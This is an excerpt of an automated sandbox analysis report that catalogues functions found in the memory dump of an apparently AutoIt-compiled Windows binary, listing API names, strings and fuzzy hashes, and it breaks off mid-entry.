                                                                          Function 00007FF7ADC7F9EC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65pipeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CreateHandlePipe
                                                                          • String ID: nul
                                                                          • API String ID: 1424370930-2873401336
                                                                          • Opcode ID: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                          • Instruction ID: 8363ad518576864bbe5567911268ec8c758a632f4ec484daf3e419f7e9d056a9
                                                                          • Opcode Fuzzy Hash: c3b93562104d94dec8cab7a09dad708560240dd78c66e81481d559291ba52c16
                                                                          • Instruction Fuzzy Hash: D5218422E1EB4685F710AB24D454379A3A0FB85B78FE14335DA6E067E4EF7CD0068B20
                                                                          Function 00007FF7ADC08F40 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Rect$Client$Window$MetricsScreenSystem
                                                                          • String ID:
                                                                          • API String ID: 3220332590-0
                                                                          • Opcode ID: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                          • Instruction ID: 36be6b77c2c0cbd638dd9494e20c743d360b1c96b37f288aecae1b1a1adace50
                                                                          • Opcode Fuzzy Hash: d8f977ea4750bda3b048e49f0aa9ed333f17e400e230103ea3ed7eb9902d4993
                                                                          • Instruction Fuzzy Hash: E5A1095AA1D25389E724AF3184087BD7371FF48B18F965135EE1947AA4FE3D9C02D320
                                                                          Function 00007FF7ADC2A054 Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 492COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: f$p
                                                                          • API String ID: 3215553584-1290815066
                                                                          • Opcode ID: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                          • Instruction ID: ed271bc07bb0131ba4f63ad814a315bab7978d422b3c1cef957bebf029ed9ae7
                                                                          • Opcode Fuzzy Hash: 6085b62d98b7eab37ce0c073fe453d3efb4bb7d0cdd32a8db3e6aa1a08046eff
                                                                          • Instruction Fuzzy Hash: 7212C522E0E2538DFB20BB14E14467AF661EB40F54FD54232D699866E4FF3DE7428B24
                                                                          Function 00007FF7ADC6AD30 Relevance: 9.2, APIs: 6, Instructions: 193memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearCopy$AllocInitString
                                                                          • String ID:
                                                                          • API String ID: 3859894641-0
                                                                          • Opcode ID: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                          • Instruction ID: 083b55da8ee80a8a0296dcd7b787a16e91760c71dedaabb31147a502ae789aaf
                                                                          • Opcode Fuzzy Hash: e8b24930f51ba047eb7d77df0b47a13309a91a72afe8362d3ff3918905f513c3
                                                                          • Instruction Fuzzy Hash: 6B717E6190E24299EA24BBA5955407CE260FF44B80FD26031E74A877B1FF2DEA139323
                                                                          Function 00007FF7ADC01E04 Relevance: 9.1, APIs: 6, Instructions: 108COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                          • String ID:
                                                                          • API String ID: 2592858361-0
                                                                          • Opcode ID: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                          • Instruction ID: 7c55f02f147317ac53e4fc51bf485854ec634ba3551c0dc1c5bf199b452d19be
                                                                          • Opcode Fuzzy Hash: 55256b84f857a58467b122c2e0110198eeb840c0349577806b29d092c26582af
                                                                          • Instruction Fuzzy Hash: 2351BE72A1E7828AE720EB11D4583B9B760FB49F94FD24235DA5D43BA0EF3CE5428710
                                                                          Function 00007FF7ADC31E74 Relevance: 9.1, APIs: 6, Instructions: 56threadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$CloseCreateErrorFreeHandleLastLibraryResume_invalid_parameter_noinfo
                                                                          • String ID:
                                                                          • API String ID: 2082702847-0
                                                                          • Opcode ID: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                          • Instruction ID: 54b69959c784c80072834cd24e68b67f342726fa6f9431d7db13c73906358571
                                                                          • Opcode Fuzzy Hash: a458dfd9bfd9b277759dc90733565293cd25b8068806620b860b1285bf48ee5e
                                                                          • Instruction Fuzzy Hash: 2C218021A0F7428DEE18BB60A404179E290EF44774FC60730E92D033F5EF7CE4068620
                                                                          Function 00007FF7ADC72240 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: CapsDevice$Release
                                                                          • String ID:
                                                                          • API String ID: 1035833867-0
                                                                          • Opcode ID: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                          • Instruction ID: 3b20817e528c2606251be348537afd244b657424f9a63811f761d057faf1039a
                                                                          • Opcode Fuzzy Hash: db491a3267b275339f548d81dbee8ecebd291c24a581f1a9e6271a89bb132f3c
                                                                          • Instruction Fuzzy Hash: 2F11A335B1AB018AEB48DB619808029A6A5FB48FC1FC68438CE0E47B64EE3DD8028700
                                                                          Function 00007FF7ADCB09FC Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                          • String ID:
                                                                          • API String ID: 43455801-0
                                                                          • Opcode ID: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                          • Instruction ID: 2ddd6f5fce3d0bd6da860915061b3040b6cfc0762d86f987bedd8f7039d51dce
                                                                          • Opcode Fuzzy Hash: cd64bc4caddf1c30f8798d15c9bc183870131294e5ef7b47fced05608eeea06d
                                                                          • Instruction Fuzzy Hash: C711C132B292929AE714AB15B814768BB60FF86F84FD95130CF0607B60EF7DE446C750
                                                                          Function 00007FF7ADC22D5C Relevance: 9.0, APIs: 6, Instructions: 39keyboardCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual
                                                                          • String ID:
                                                                          • API String ID: 4278518827-0
                                                                          • Opcode ID: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                          • Instruction ID: 56d15e12528ac8104cf4914281e8c40cbd82598ae99b800a317ead318c8cf4df
                                                                          • Opcode Fuzzy Hash: d88387182f0ff78ab7778ef1a67cdc330360886ef23228c05630025599c5fb3f
                                                                          • Instruction Fuzzy Hash: FE11527291A6808AD349DF39DC481197BB2FB58B08B958534C2498F275FF39D49BC710
                                                                          Function 00007FF7ADC7DA1C Relevance: 9.0, APIs: 6, Instructions: 34windowtimethreadCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                          • String ID:
                                                                          • API String ID: 839392675-0
                                                                          • Opcode ID: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                          • Instruction ID: c683b261482cda9cf36eca45bc7f28dcf1a180dc2845228ca9f83ced92fb4aa4
                                                                          • Opcode Fuzzy Hash: 8de778dfa191c13712f893bc864b87f9ca3b199504ecf632adb079649907a02e
                                                                          • Instruction Fuzzy Hash: DB018F32B2E78187EB50AB21E814A29B361FF89B95FC55134CA0A07B24EF3CD0498B00
                                                                          Function 00007FF7ADC97E38 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 237COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FreeFromProgTask$BlanketConnectConnection2CreateInitializeInstanceOpenProxyQueryRegistrySecurityValuelstrcmpi
                                                                          • String ID: NULL Pointer assignment
                                                                          • API String ID: 1653399731-2785691316
                                                                          • Opcode ID: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                          • Instruction ID: 8a35a50c2cd17c5dd6dee06284df7edf0c7adf99087a29dad392bdd02d7e5939
                                                                          • Opcode Fuzzy Hash: 069250944c4b5cae8d9ba027fcc4337deb9b93f0114834e2bf5349901f1538a4
                                                                          • Instruction Fuzzy Hash: 03B15B32A09A518EEB10EF61D4401EDBBB1FB84798FD10136EE4D57A68EF38D646C750
                                                                          Function 00007FF7ADC9CDF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,?,?,00000003,00000000,?,00007FF7ADC9BF47), ref: 00007FF7ADC9CE29
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharLower
                                                                          • String ID: cdecl$none$stdcall$winapi
                                                                          • API String ID: 2358735015-567219261
                                                                          • Opcode ID: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                          • Instruction ID: 2667f2b689b8e32cd8cf029f3c3ab1918e1e7f1bc046b64b442f9408caa0d750
                                                                          • Opcode Fuzzy Hash: 02b910466ee187c44740fa94090c75d71f2fbf299a4025593c27fff920242e11
                                                                          • Instruction Fuzzy Hash: 2491F722F1E6128AEA10AF258540579A7A2FF14B84BD24131FA5E537A4FF3DE953C320
                                                                          Function 00007FF7ADC96920 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 212COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                          • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                          • API String ID: 4237274167-1221869570
                                                                          • Opcode ID: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                          • Instruction ID: d2b36a611f46da6363d1548086a1287bf79fa33888194af44e5d8605551bdab0
                                                                          • Opcode Fuzzy Hash: 547064277256a578b14e90cf15900b857c5a7bc6aa9a77bb28066ad4bccadfc1
                                                                          • Instruction Fuzzy Hash: 0F918E22B4AB4289EB10EF65D4402ACB365EB44B88FC64431EE5D477A5FF38D506C360
                                                                          Function 00007FF7ADC70EAF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 187COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetForegroundWindow.USER32 ref: 00007FF7ADC70EDB
                                                                            • Part of subcall function 00007FF7ADC70B90: CharUpperBuffW.USER32(?,?,00000001,00007FF7ADC70F61), ref: 00007FF7ADC70C6A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharForegroundUpperWindow
                                                                          • String ID: ACTIVE$HANDLE$LAST$REGEXPTITLE
                                                                          • API String ID: 3570115564-1994484594
                                                                          • Opcode ID: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                          • Instruction ID: 454f928d6ba8fdadde1a76579f643ea87d5d67744badd8f8846a9162e2f466a4
                                                                          • Opcode Fuzzy Hash: aa2d75645f71e86a50ff5ca5877f2f0bc66e0fe209def1fa84d7ab904b0cb0e5
                                                                          • Instruction Fuzzy Hash: 7371B112B0FA4389FA64BB61D8112B9E2A1FF54784FC65131D94E876B0FF3CE5469720
                                                                          Function 00007FF7ADC79898 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharUpper
                                                                          • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                          • API String ID: 3964851224-769500911
                                                                          • Opcode ID: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                          • Instruction ID: df118cdf5a00c604969b8e1eda80a12fbe60746daca3441195dea64bd745083b
                                                                          • Opcode Fuzzy Hash: e386f8ab1d92894773db659cf3300b3f053d0d71c47061b204d1c004bb332453
                                                                          • Instruction Fuzzy Hash: 7441D422F1FA1349FA606B25C804179E2A1EB24BD0BD64631CA5D837A4FE3DE9438720
                                                                          Function 00007FF7ADC39B18 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 121COMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: _invalid_parameter_noinfo
                                                                          • String ID: #$E$O
                                                                          • API String ID: 3215553584-248080428
                                                                          • Opcode ID: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                          • Instruction ID: b60b1c118c522c0f030decaef61fe2baf4a39c7a5ee7b37ff5320f7814f13942
                                                                          • Opcode Fuzzy Hash: d3d7a61e74d4108eabe1bc636e3d6f208025dc38477a0a881e01c4be7aab7093
                                                                          • Instruction Fuzzy Hash: 5F416022A1E75189EF69AF25A8401A9E3B0FF54B88FC94031EE4D07769EF7CD4428320
                                                                          Function 00007FF7ADC7B62C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 95filestringCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000F.00000002.1666315516.00007FF7ADC01000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7ADC00000, based on PE: true
                                                                          • Associated: 0000000F.00000002.1666233589.00007FF7ADC00000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCB5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666652679.00007FF7ADCD8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1666946012.00007FF7ADCEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                          • Associated: 0000000F.00000002.1667152652.00007FF7ADCF4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_15_2_7ff7adc00000_XKIZdXAs.jbxd
                                                                          Similarity
                                                                          • API ID: FileFullNamePath$MoveOperationlstrcmpiwcscat
                                                                          • String ID: \*.*
                                                                          • API String ID: 3196045410-1173974218
                                                                          • Opcode ID: 19a9c623901bedbfdd4e3d81bd8b065a0a92971c24d4d3071b995089b4c63289
                                                                          • Instruction ID: 139a48e78085c82bb477003be2b6dccdc24494f0e418aec6e481298891f354f5
